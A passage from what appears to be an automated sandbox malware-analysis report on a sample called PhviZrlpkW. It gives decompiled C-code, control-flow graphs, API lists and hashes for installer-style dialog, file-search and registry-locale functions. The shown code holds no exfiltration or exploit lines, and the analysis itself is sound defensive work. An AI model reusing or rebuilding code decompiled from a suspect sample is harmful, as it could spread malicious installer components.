                    0x00407314
                    0x00407317
                    0x004072d9
                    0x004072d9
                    0x004072e1
                    0x004072e6
                    0x004072e8
                    0x004072eb
                    0x004072eb
                    0x0040731a
                    0x00407321
                    0x004072ab
                    0x004072ab
                    0x004072ab
                    0x004072ab
                    0x00000000
                    0x00407323
                    0x00000000
                    0x00407323
                    0x00407321
                    0x00407234
                    0x00407237
                    0x00407239
                    0x0040723c
                    0x0040723f
                    0x00407242
                    0x00407244
                    0x00407247
                    0x0040724a
                    0x0040724a
                    0x0040724d
                    0x0040724d
                    0x00407250
                    0x00407257
                    0x0040722b
                    0x0040722b
                    0x0040722b
                    0x0040722b
                    0x00000000
                    0x00407259
                    0x00000000
                    0x00407259
                    0x00407257
                    0x004071dd
                    0x004071e0
                    0x004071e2
                    0x004071e5
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x004070cf
                    0x004070cf
                    0x004070d3
                    0x00407599
                    0x00000000
                    0x00407599
                    0x004070d9
                    0x004070dc
                    0x004070df
                    0x004070e2
                    0x004070e4
                    0x004070e4
                    0x004070e4
                    0x004070e7
                    0x004070ea
                    0x004070ed
                    0x004070f0
                    0x004070f3
                    0x004070f6
                    0x004070f7
                    0x004070f9
                    0x004070f9
                    0x004070f9
                    0x004070fc
                    0x004070ff
                    0x00407102
                    0x00407105
                    0x00407105
                    0x00407105
                    0x00407108
                    0x00000000
                    0x00000000
                    0x0040734c
                    0x0040734c
                    0x0040734c
                    0x00407350
                    0x00000000
                    0x00000000
                    0x00407356
                    0x00407359
                    0x0040735c
                    0x0040735f
                    0x00407361
                    0x00407361
                    0x00407361
                    0x00407364
                    0x00407367
                    0x0040736a
                    0x0040736d
                    0x00407370
                    0x00407373
                    0x00407374
                    0x00407376
                    0x00407376
                    0x00407376
                    0x00407379
                    0x0040737c
                    0x0040737f
                    0x00407382
                    0x00407385
                    0x00407389
                    0x0040738b
                    0x0040738e
                    0x00000000
                    0x00407390
                    0x00000000
                    0x00407390
                    0x0040738e
                    0x004075c3
                    0x00000000
                    0x00000000
                    0x00406bf2

                    Memory Dump Source
                    • Source File: 00000000.00000002.313574929.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.313568294.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313589092.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313755126.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313755126.000000000047B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_PhviZrlpkW.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 6ae840c17bc4cb012e3c6e2f9739eb08ea49decd14d2b7f73774d31e5ba5825a
                    • Instruction ID: 02c1e40b0c9780dd067322b7733c474732bd0f187a49f53fd7fd3c108ee94619
                    • Opcode Fuzzy Hash: 6ae840c17bc4cb012e3c6e2f9739eb08ea49decd14d2b7f73774d31e5ba5825a
                    • Instruction Fuzzy Hash: 7CF15570D04229CBDF28CFA8C8946ADBBB0FF44305F24816ED456BB281D7386A86DF45
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040699E Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E0040699E(WCHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileW(_a4, 0x426798); // executed
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2);
				return 0x426798;
			}




                    0x004069a9
                    0x004069b2
                    0x00000000
                    0x004069bf
                    0x004069b5
                    0x00000000

                    APIs
                    • FindFirstFileW.KERNELBASE(7476FAA0,00426798,00425F50,00406088,00425F50,00425F50,00000000,00425F50,00425F50,7476FAA0,?,7476F560,00405D94,?,7476FAA0,7476F560), ref: 004069A9
                    • FindClose.KERNEL32(00000000), ref: 004069B5
                    Memory Dump Source
                    • Source File: 00000000.00000002.313574929.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.313568294.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313589092.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313755126.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313755126.000000000047B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_PhviZrlpkW.jbxd
                    Similarity
                    • API ID: Find$CloseFileFirst
                    • String ID:
                    • API String ID: 2295610775-0
                    • Opcode ID: 1093b80bdde5f117a2aeaff90f04fc035896fcf98737a4a628a8a679d5dfa397
                    • Instruction ID: 0ca7534fdffec89160a31ceabb6ef5ff718bfc83d1618d69d17f9e635378cbc3
                    • Opcode Fuzzy Hash: 1093b80bdde5f117a2aeaff90f04fc035896fcf98737a4a628a8a679d5dfa397
                    • Instruction Fuzzy Hash: 5ED012B15192205FC34057387E0C84B7A989F563317268A36B4AAF11E0CB348C3297AC
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 004040C5 Relevance: 61.6, APIs: 34, Strings: 1, Instructions: 357windowstringCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 141 4040c5-4040d7 142 4040dd-4040e3 141->142 143 40423e-40424d 141->143 142->143 144 4040e9-4040f2 142->144 145 40429c-4042b1 143->145 146 40424f-40428a GetDlgItem * 2 call 4045c4 KiUserCallbackDispatcher call 40140b 143->146 149 4040f4-404101 SetWindowPos 144->149 150 404107-40410e 144->150 147 4042f1-4042f6 call 404610 145->147 148 4042b3-4042b6 145->148 167 40428f-404297 146->167 163 4042fb-404316 147->163 152 4042b8-4042c3 call 401389 148->152 153 4042e9-4042eb 148->153 149->150 155 404110-40412a ShowWindow 150->155 156 404152-404158 150->156 152->153 177 4042c5-4042e4 SendMessageW 152->177 153->147 162 404591 153->162 164 404130-404143 GetWindowLongW 155->164 165 40422b-404239 call 40462b 155->165 158 404171-404174 156->158 159 40415a-40416c DestroyWindow 156->159 169 404176-404182 SetWindowLongW 158->169 170 404187-40418d 158->170 166 40456e-404574 159->166 168 404593-40459a 162->168 173 404318-40431a call 40140b 163->173 174 40431f-404325 163->174 164->165 175 404149-40414c ShowWindow 164->175 165->168 166->162 180 404576-40457c 166->180 167->145 169->168 170->165 176 404193-4041a2 GetDlgItem 170->176 173->174 181 40432b-404336 174->181 182 40454f-404568 DestroyWindow EndDialog 174->182 175->156 184 4041c1-4041c4 176->184 185 4041a4-4041bb SendMessageW IsWindowEnabled 176->185 177->168 180->162 186 40457e-404587 ShowWindow 180->186 181->182 183 40433c-404389 call 4066a5 call 4045c4 * 3 GetDlgItem 181->183 182->166 213 404393-4043cf ShowWindow EnableWindow call 4045e6 EnableWindow 183->213 214 40438b-404390 183->214 188 4041c6-4041c7 184->188 189 4041c9-4041cc 184->189 185->162 185->184 186->162 191 4041f7-4041fc call 40459d 188->191 192 4041da-4041df 189->192 193 4041ce-4041d4 189->193 191->165 196 404215-404225 SendMessageW 192->196 198 4041e1-4041e7 192->198 193->196 197 4041d6-4041d8 193->197 196->165 197->191 201 4041e9-4041ef call 40140b 198->201 202 4041fe-404207 call 40140b 198->202 209 4041f5 201->209 202->165 211 404209-404213 202->211 209->191 211->209 217 4043d1-4043d2 213->217 218 4043d4 213->218 214->213 219 4043d6-404404 GetSystemMenu EnableMenuItem SendMessageW 217->219 218->219 220 404406-404417 SendMessageW 219->220 221 404419 219->221 222 40441f-40445e call 4045f9 call 4040a6 call 406668 lstrlenW call 4066a5 SetWindowTextW call 401389 220->222 221->222 222->163 233 404464-404466 222->233 233->163 234 40446c-404470 233->234 235 404472-404478 234->235 236 40448f-4044a3 DestroyWindow 234->236 235->162 237 40447e-404484 235->237 236->166 238 4044a9-4044d6 CreateDialogParamW 236->238 237->163 239 40448a 237->239 238->166 240 4044dc-404533 call 4045c4 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 238->240 239->162 240->162 245 404535-40454d ShowWindow call 404610 240->245 245->166
                    C-Code - Quality: 84%
                    			E004040C5(struct HWND__* _a4, intOrPtr _a8, int _a12, long _a16) {
				struct HWND__* _v28;
				void* _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t34;
				signed int _t36;
				signed int _t38;
				struct HWND__* _t48;
				signed int _t67;
				struct HWND__* _t73;
				signed int _t86;
				struct HWND__* _t91;
				signed int _t99;
				int _t103;
				signed int _t117;
				int _t118;
				int _t122;
				signed int _t124;
				struct HWND__* _t127;
				struct HWND__* _t128;
				int _t129;
				intOrPtr _t130;
				long _t133;
				int _t135;
				int _t136;
				void* _t137;
				void* _t145;

				_t130 = _a8;
				if(_t130 == 0x110 || _t130 == 0x408) {
					_t34 = _a12;
					_t127 = _a4;
					__eflags = _t130 - 0x110;
					 *0x423730 = _t34;
					if(_t130 == 0x110) {
						 *0x42a268 = _t127;
						 *0x423744 = GetDlgItem(_t127, 1);
						_t91 = GetDlgItem(_t127, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x421710 = _t91;
						E004045C4(_t127);
						SetClassLongW(_t127, 0xfffffff2,  *0x429248); // executed
						 *0x42922c = E0040140B(4);
						_t34 = 1;
						__eflags = 1;
						 *0x423730 = 1;
					}
					_t124 =  *0x40a39c; // 0x0
					_t136 = 0;
					_t133 = (_t124 << 6) +  *0x42a280;
					__eflags = _t124;
					if(_t124 < 0) {
						L36:
						E00404610(0x40b);
						while(1) {
							_t36 =  *0x423730;
							 *0x40a39c =  *0x40a39c + _t36;
							_t133 = _t133 + (_t36 << 6);
							_t38 =  *0x40a39c; // 0x0
							__eflags = _t38 -  *0x42a284;
							if(_t38 ==  *0x42a284) {
								E0040140B(1);
							}
							__eflags =  *0x42922c - _t136;
							if( *0x42922c != _t136) {
								break;
							}
							__eflags =  *0x40a39c -  *0x42a284; // 0x0
							if(__eflags >= 0) {
								break;
							}
							_t117 =  *(_t133 + 0x14);
							E004066A5(_t117, _t127, _t133, 0x43a000,  *((intOrPtr*)(_t133 + 0x24)));
							_push( *((intOrPtr*)(_t133 + 0x20)));
							_push(0xfffffc19);
							E004045C4(_t127);
							_push( *((intOrPtr*)(_t133 + 0x1c)));
							_push(0xfffffc1b);
							E004045C4(_t127);
							_push( *((intOrPtr*)(_t133 + 0x28)));
							_push(0xfffffc1a);
							E004045C4(_t127);
							_t48 = GetDlgItem(_t127, 3);
							__eflags =  *0x42a2ec - _t136;
							_v28 = _t48;
							if( *0x42a2ec != _t136) {
								_t117 = _t117 & 0x0000fefd | 0x00000004;
								__eflags = _t117;
							}
							ShowWindow(_t48, _t117 & 0x00000008);
							EnableWindow( *(_t137 + 0x34), _t117 & 0x00000100);
							E004045E6(_t117 & 0x00000002);
							_t118 = _t117 & 0x00000004;
							EnableWindow( *0x421710, _t118);
							__eflags = _t118 - _t136;
							if(_t118 == _t136) {
								_push(1);
							} else {
								_push(_t136);
							}
							EnableMenuItem(GetSystemMenu(_t127, _t136), 0xf060, ??);
							SendMessageW( *(_t137 + 0x3c), 0xf4, _t136, 1);
							__eflags =  *0x42a2ec - _t136;
							if( *0x42a2ec == _t136) {
								_push( *0x423744);
							} else {
								SendMessageW(_t127, 0x401, 2, _t136);
								_push( *0x421710);
							}
							E004045F9();
							E00406668(0x423748, E004040A6());
							E004066A5(0x423748, _t127, _t133,  &(0x423748[lstrlenW(0x423748)]),  *((intOrPtr*)(_t133 + 0x18)));
							SetWindowTextW(_t127, 0x423748);
							_push(_t136);
							_t67 = E00401389( *((intOrPtr*)(_t133 + 8)));
							__eflags = _t67;
							if(_t67 != 0) {
								continue;
							} else {
								__eflags =  *_t133 - _t136;
								if( *_t133 == _t136) {
									continue;
								}
								__eflags =  *(_t133 + 4) - 5;
								if( *(_t133 + 4) != 5) {
									DestroyWindow( *0x429238);
									 *0x422720 = _t133;
									__eflags =  *_t133 - _t136;
									if( *_t133 <= _t136) {
										goto L60;
									}
									_t73 = CreateDialogParamW( *0x42a260,  *_t133 +  *0x429240 & 0x0000ffff, _t127,  *(0x40a3a0 +  *(_t133 + 4) * 4), _t133);
									__eflags = _t73 - _t136;
									 *0x429238 = _t73;
									if(_t73 == _t136) {
										goto L60;
									}
									_push( *((intOrPtr*)(_t133 + 0x2c)));
									_push(6);
									E004045C4(_t73);
									GetWindowRect(GetDlgItem(_t127, 0x3fa), _t137 + 0x10);
									ScreenToClient(_t127, _t137 + 0x10);
									SetWindowPos( *0x429238, _t136,  *(_t137 + 0x20),  *(_t137 + 0x20), _t136, _t136, 0x15);
									_push(_t136);
									E00401389( *((intOrPtr*)(_t133 + 0xc)));
									__eflags =  *0x42922c - _t136;
									if( *0x42922c != _t136) {
										goto L63;
									}
									ShowWindow( *0x429238, 8);
									E00404610(0x405);
									goto L60;
								}
								__eflags =  *0x42a2ec - _t136;
								if( *0x42a2ec != _t136) {
									goto L63;
								}
								__eflags =  *0x42a2e0 - _t136;
								if( *0x42a2e0 != _t136) {
									continue;
								}
								goto L63;
							}
						}
						DestroyWindow( *0x429238); // executed
						 *0x42a268 = _t136;
						EndDialog(_t127,  *0x421f18);
						goto L60;
					} else {
						__eflags = _t34 - 1;
						if(_t34 != 1) {
							L35:
							__eflags =  *_t133 - _t136;
							if( *_t133 == _t136) {
								goto L63;
							}
							goto L36;
						}
						_push(0);
						_t86 = E00401389( *((intOrPtr*)(_t133 + 0x10)));
						__eflags = _t86;
						if(_t86 == 0) {
							goto L35;
						}
						SendMessageW( *0x429238, 0x40f, 0, 1);
						__eflags =  *0x42922c;
						return 0 |  *0x42922c == 0x00000000;
					}
				} else {
					_t127 = _a4;
					_t136 = 0;
					if(_t130 == 0x47) {
						SetWindowPos( *0x423728, _t127, 0, 0, 0, 0, 0x13);
					}
					_t122 = _a12;
					if(_t130 != 5) {
						L8:
						if(_t130 != 0x40d) {
							__eflags = _t130 - 0x11;
							if(_t130 != 0x11) {
								__eflags = _t130 - 0x111;
								if(_t130 != 0x111) {
									goto L28;
								}
								_t135 = _t122 & 0x0000ffff;
								_t128 = GetDlgItem(_t127, _t135);
								__eflags = _t128 - _t136;
								if(_t128 == _t136) {
									L15:
									__eflags = _t135 - 1;
									if(_t135 != 1) {
										__eflags = _t135 - 3;
										if(_t135 != 3) {
											_t129 = 2;
											__eflags = _t135 - _t129;
											if(_t135 != _t129) {
												L27:
												SendMessageW( *0x429238, 0x111, _t122, _a16);
												goto L28;
											}
											__eflags =  *0x42a2ec - _t136;
											if( *0x42a2ec == _t136) {
												_t99 = E0040140B(3);
												__eflags = _t99;
												if(_t99 != 0) {
													goto L28;
												}
												 *0x421f18 = 1;
												L23:
												_push(0x78);
												L24:
												E0040459D();
												goto L28;
											}
											E0040140B(_t129);
											 *0x421f18 = _t129;
											goto L23;
										}
										__eflags =  *0x40a39c - _t136; // 0x0
										if(__eflags <= 0) {
											goto L27;
										}
										_push(0xffffffff);
										goto L24;
									}
									_push(_t135);
									goto L24;
								}
								SendMessageW(_t128, 0xf3, _t136, _t136);
								_t103 = IsWindowEnabled(_t128);
								__eflags = _t103;
								if(_t103 == 0) {
									L63:
									return 0;
								}
								goto L15;
							}
							SetWindowLongW(_t127, _t136, _t136);
							return 1;
						}
						DestroyWindow( *0x429238);
						 *0x429238 = _t122;
						L60:
						_t145 =  *0x425748 - _t136; // 0x0
						if(_t145 == 0 &&  *0x429238 != _t136) {
							ShowWindow(_t127, 0xa);
							 *0x425748 = 1;
						}
						goto L63;
					} else {
						asm("sbb eax, eax");
						ShowWindow( *0x423728,  ~(_t122 - 1) & 0x00000005);
						if(_t122 != 2 || (GetWindowLongW(_t127, 0xfffffff0) & 0x21010000) != 0x1000000) {
							L28:
							return E0040462B(_a8, _t122, _a16);
						} else {
							ShowWindow(_t127, 4);
							goto L8;
						}
					}
				}
			}
































                    0x004040d0
                    0x004040d7
                    0x0040423e
                    0x00404242
                    0x00404246
                    0x00404248
                    0x0040424d
                    0x00404258
                    0x00404263
                    0x00404268
                    0x0040426a
                    0x0040426c
                    0x0040426f
                    0x00404274
                    0x00404282
                    0x0040428f
                    0x00404296
                    0x00404296
                    0x00404297
                    0x00404297
                    0x0040429c
                    0x004042a2
                    0x004042a9
                    0x004042af
                    0x004042b1
                    0x004042f1
                    0x004042f6
                    0x004042fb
                    0x004042fb
                    0x00404300
                    0x00404309
                    0x0040430b
                    0x00404310
                    0x00404316
                    0x0040431a
                    0x0040431a
                    0x0040431f
                    0x00404325
                    0x00000000
                    0x00000000
                    0x00404330
                    0x00404336
                    0x00000000
                    0x00000000
                    0x0040433f
                    0x00404347
                    0x0040434c
                    0x0040434f
                    0x00404355
                    0x0040435a
                    0x0040435d
                    0x00404363
                    0x00404368
                    0x0040436b
                    0x00404371
                    0x00404379
                    0x0040437f
                    0x00404385
                    0x00404389
                    0x00404390
                    0x00404390
                    0x00404390
                    0x0040439a
                    0x004043ac
                    0x004043b8
                    0x004043bd
                    0x004043c7
                    0x004043cd
                    0x004043cf
                    0x004043d4
                    0x004043d1
                    0x004043d1
                    0x004043d1
                    0x004043e4
                    0x004043fc
                    0x004043fe
                    0x00404404
                    0x00404419
                    0x00404406
                    0x0040440f
                    0x00404411
                    0x00404411
                    0x0040441f
                    0x00404430
                    0x00404446
                    0x0040444d
                    0x00404453
                    0x00404457
                    0x0040445c
                    0x0040445e
                    0x00000000
                    0x00404464
                    0x00404464
                    0x00404466
                    0x00000000
                    0x00000000
                    0x0040446c
                    0x00404470
                    0x00404495
                    0x0040449b
                    0x004044a1
                    0x004044a3
                    0x00000000
                    0x00000000
                    0x004044c9
                    0x004044cf
                    0x004044d1
                    0x004044d6
                    0x00000000
                    0x00000000
                    0x004044dc
                    0x004044df
                    0x004044e2
                    0x004044f9
                    0x00404505
                    0x0040451e
                    0x00404524
                    0x00404528
                    0x0040452d
                    0x00404533
                    0x00000000
                    0x00000000
                    0x0040453d
                    0x00404548
                    0x00000000
                    0x00404548
                    0x00404472
                    0x00404478
                    0x00000000
                    0x00000000
                    0x0040447e
                    0x00404484
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0040448a
                    0x0040445e
                    0x00404555
                    0x00404561
                    0x00404568
                    0x00000000
                    0x004042b3
                    0x004042b3
                    0x004042b6
                    0x004042e9
                    0x004042e9
                    0x004042eb
                    0x00000000
                    0x00000000
                    0x00000000
                    0x004042eb
                    0x004042b8
                    0x004042bc
                    0x004042c1
                    0x004042c3
                    0x00000000
                    0x00000000
                    0x004042d3
                    0x004042db
                    0x00000000
                    0x004042e1
                    0x004040e9
                    0x004040e9
                    0x004040ed
                    0x004040f2
                    0x00404101
                    0x00404101
                    0x00404107
                    0x0040410e
                    0x00404152
                    0x00404158
                    0x00404171
                    0x00404174
                    0x00404187
                    0x0040418d
                    0x00000000
                    0x00000000
                    0x00404193
                    0x0040419e
                    0x004041a0
                    0x004041a2
                    0x004041c1
                    0x004041c1
                    0x004041c4
                    0x004041c9
                    0x004041cc
                    0x004041dc
                    0x004041dd
                    0x004041df
                    0x00404215
                    0x00404225
                    0x00000000
                    0x00404225
                    0x004041e1
                    0x004041e7
                    0x00404200
                    0x00404205
                    0x00404207
                    0x00000000
                    0x00000000
                    0x00404209
                    0x004041f5
                    0x004041f5
                    0x004041f7
                    0x004041f7
                    0x00000000
                    0x004041f7
                    0x004041ea
                    0x004041ef
                    0x00000000
                    0x004041ef
                    0x004041ce
                    0x004041d4
                    0x00000000
                    0x00000000
                    0x004041d6
                    0x00000000
                    0x004041d6
                    0x004041c6
                    0x00000000
                    0x004041c6
                    0x004041ac
                    0x004041b3
                    0x004041b9
                    0x004041bb
                    0x00404591
                    0x00000000
                    0x00404591
                    0x00000000
                    0x004041bb
                    0x00404179
                    0x00000000
                    0x00404181
                    0x00404160
                    0x00404166
                    0x0040456e
                    0x0040456e
                    0x00404574
                    0x00404581
                    0x00404587
                    0x00404587
                    0x00000000
                    0x00404110
                    0x00404115
                    0x00404121
                    0x0040412a
                    0x0040422b
                    0x00000000
                    0x00404149
                    0x0040414c
                    0x00000000
                    0x0040414c
                    0x0040412a
                    0x0040410e

                    APIs
                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00404101
                    • ShowWindow.USER32(?), ref: 00404121
                    • GetWindowLongW.USER32(?,000000F0), ref: 00404133
                    • ShowWindow.USER32(?,00000004), ref: 0040414C
                    • DestroyWindow.USER32 ref: 00404160
                    • SetWindowLongW.USER32 ref: 00404179
                    • GetDlgItem.USER32 ref: 00404198
                    • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 004041AC
                    • IsWindowEnabled.USER32(00000000), ref: 004041B3
                    • GetDlgItem.USER32 ref: 0040425E
                    • GetDlgItem.USER32 ref: 00404268
                    • KiUserCallbackDispatcher.NTDLL(?,000000F2,?), ref: 00404282
                    • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004042D3
                    • GetDlgItem.USER32 ref: 00404379
                    • ShowWindow.USER32(00000000,?), ref: 0040439A
                    • EnableWindow.USER32(?,?), ref: 004043AC
                    • EnableWindow.USER32(?,?), ref: 004043C7
                    • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004043DD
                    • EnableMenuItem.USER32 ref: 004043E4
                    • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004043FC
                    • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040440F
                    • lstrlenW.KERNEL32(00423748,?,00423748,00000000), ref: 00404439
                    • SetWindowTextW.USER32(?,00423748), ref: 0040444D
                    • ShowWindow.USER32(?,0000000A), ref: 00404581
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.313574929.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.313568294.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313589092.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313755126.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313755126.000000000047B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_PhviZrlpkW.jbxd
                    Similarity
                    • API ID: Window$Item$MessageSendShow$Enable$LongMenu$CallbackDestroyDispatcherEnabledSystemTextUserlstrlen
                    • String ID: H7B
                    • API String ID: 2475350683-2300413410
                    • Opcode ID: b499a380baa1669b9d39d87f51061d2fd0c3acf201e93ffa24678bb3f42416dd
                    • Instruction ID: 1d4a55fced449df2e2a9dfc159c1061f424388fbea236c5341ec002980a30b6c
                    • Opcode Fuzzy Hash: b499a380baa1669b9d39d87f51061d2fd0c3acf201e93ffa24678bb3f42416dd
                    • Instruction Fuzzy Hash: C0C1C2B1600604FBDB216F61EE85E2A3B78EB85745F40097EF781B51F0CB3958529B2E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00403D17 Relevance: 44.0, APIs: 13, Strings: 12, Instructions: 215stringregistryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 248 403d17-403d2f call 406a35 251 403d31-403d41 call 4065af 248->251 252 403d43-403d7a call 406536 248->252 261 403d9d-403dc6 call 403fed call 40603f 251->261 257 403d92-403d98 lstrcatW 252->257 258 403d7c-403d8d call 406536 252->258 257->261 258->257 266 403e58-403e60 call 40603f 261->266 267 403dcc-403dd1 261->267 273 403e62-403e69 call 4066a5 266->273 274 403e6e-403e93 LoadImageW 266->274 267->266 269 403dd7-403dff call 406536 267->269 269->266 275 403e01-403e05 269->275 273->274 277 403f14-403f1c call 40140b 274->277 278 403e95-403ec5 RegisterClassW 274->278 279 403e17-403e23 lstrlenW 275->279 280 403e07-403e14 call 405f64 275->280 291 403f26-403f31 call 403fed 277->291 292 403f1e-403f21 277->292 281 403fe3 278->281 282 403ecb-403f0f SystemParametersInfoW CreateWindowExW 278->282 286 403e25-403e33 lstrcmpiW 279->286 287 403e4b-403e53 call 405f37 call 406668 279->287 280->279 285 403fe5-403fec 281->285 282->277 286->287 290 403e35-403e3f GetFileAttributesW 286->290 287->266 294 403e41-403e43 290->294 295 403e45-403e46 call 405f83 290->295 301 403f37-403f51 ShowWindow call 4069c5 291->301 302 403fba-403fc2 call 40579d 291->302 292->285 294->287 294->295 295->287 307 403f53-403f58 call 4069c5 301->307 308 403f5d-403f6f GetClassInfoW 301->308 309 403fc4-403fca 302->309 310 403fdc-403fde call 40140b 302->310 307->308 313 403f71-403f81 GetClassInfoW RegisterClassW 308->313 314 403f87-403faa DialogBoxParamW call 40140b 308->314 309->292 315 403fd0-403fd7 call 40140b 309->315 310->281 313->314 319 403faf-403fb8 call 403c67 314->319 315->292 319->285
                    C-Code - Quality: 96%
                    			E00403D17(void* __eflags) {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				void _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t22;
				void* _t30;
				void* _t32;
				int _t33;
				void* _t36;
				int _t39;
				int _t40;
				int _t44;
				short _t63;
				WCHAR* _t65;
				signed char _t69;
				WCHAR* _t76;
				intOrPtr _t82;
				WCHAR* _t87;

				_t82 =  *0x42a270;
				_t22 = E00406A35(2);
				_t90 = _t22;
				if(_t22 == 0) {
					_t76 = 0x423748;
					L"1033" = 0x30;
					 *0x437002 = 0x78;
					 *0x437004 = 0;
					E00406536(_t78, __eflags, 0x80000001, L"Control Panel\\Desktop\\ResourceLocale", 0, 0x423748, 0);
					__eflags =  *0x423748;
					if(__eflags == 0) {
						E00406536(_t78, __eflags, 0x80000003, L".DEFAULT\\Control Panel\\International",  &M004083D4, 0x423748, 0);
					}
					lstrcatW(L"1033", _t76);
				} else {
					E004065AF(L"1033",  *_t22() & 0x0000ffff);
				}
				E00403FED(_t78, _t90);
				 *0x42a2e0 =  *0x42a278 & 0x00000020;
				 *0x42a2fc = 0x10000;
				if(E0040603F(_t90, 0x435800) != 0) {
					L16:
					if(E0040603F(_t98, 0x435800) == 0) {
						E004066A5(_t76, 0, _t82, 0x435800,  *((intOrPtr*)(_t82 + 0x118)));
					}
					_t30 = LoadImageW( *0x42a260, 0x67, 1, 0, 0, 0x8040); // executed
					 *0x429248 = _t30;
					if( *((intOrPtr*)(_t82 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t32 = E00403FED(_t78, __eflags);
							__eflags =  *0x42a300;
							if( *0x42a300 != 0) {
								_t33 = E0040579D(_t32, 0);
								__eflags = _t33;
								if(_t33 == 0) {
									E0040140B(1);
									goto L33;
								}
								__eflags =  *0x42922c;
								if( *0x42922c == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x423728, 5); // executed
							_t39 = E004069C5("RichEd20"); // executed
							__eflags = _t39;
							if(_t39 == 0) {
								E004069C5("RichEd32");
							}
							_t87 = L"RichEdit20W";
							_t40 = GetClassInfoW(0, _t87, 0x429200);
							__eflags = _t40;
							if(_t40 == 0) {
								GetClassInfoW(0, L"RichEdit", 0x429200);
								 *0x429224 = _t87;
								RegisterClassW(0x429200);
							}
							_t44 = DialogBoxParamW( *0x42a260,  *0x429240 + 0x00000069 & 0x0000ffff, 0, E004040C5, 0); // executed
							E00403C67(E0040140B(5), 1);
							return _t44;
						}
						L22:
						_t36 = 2;
						return _t36;
					} else {
						_t78 =  *0x42a260;
						 *0x429204 = E00401000;
						 *0x429210 =  *0x42a260;
						 *0x429214 = _t30;
						 *0x429224 = 0x40a3b4;
						if(RegisterClassW(0x429200) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						SystemParametersInfoW(0x30, 0,  &_v16, 0);
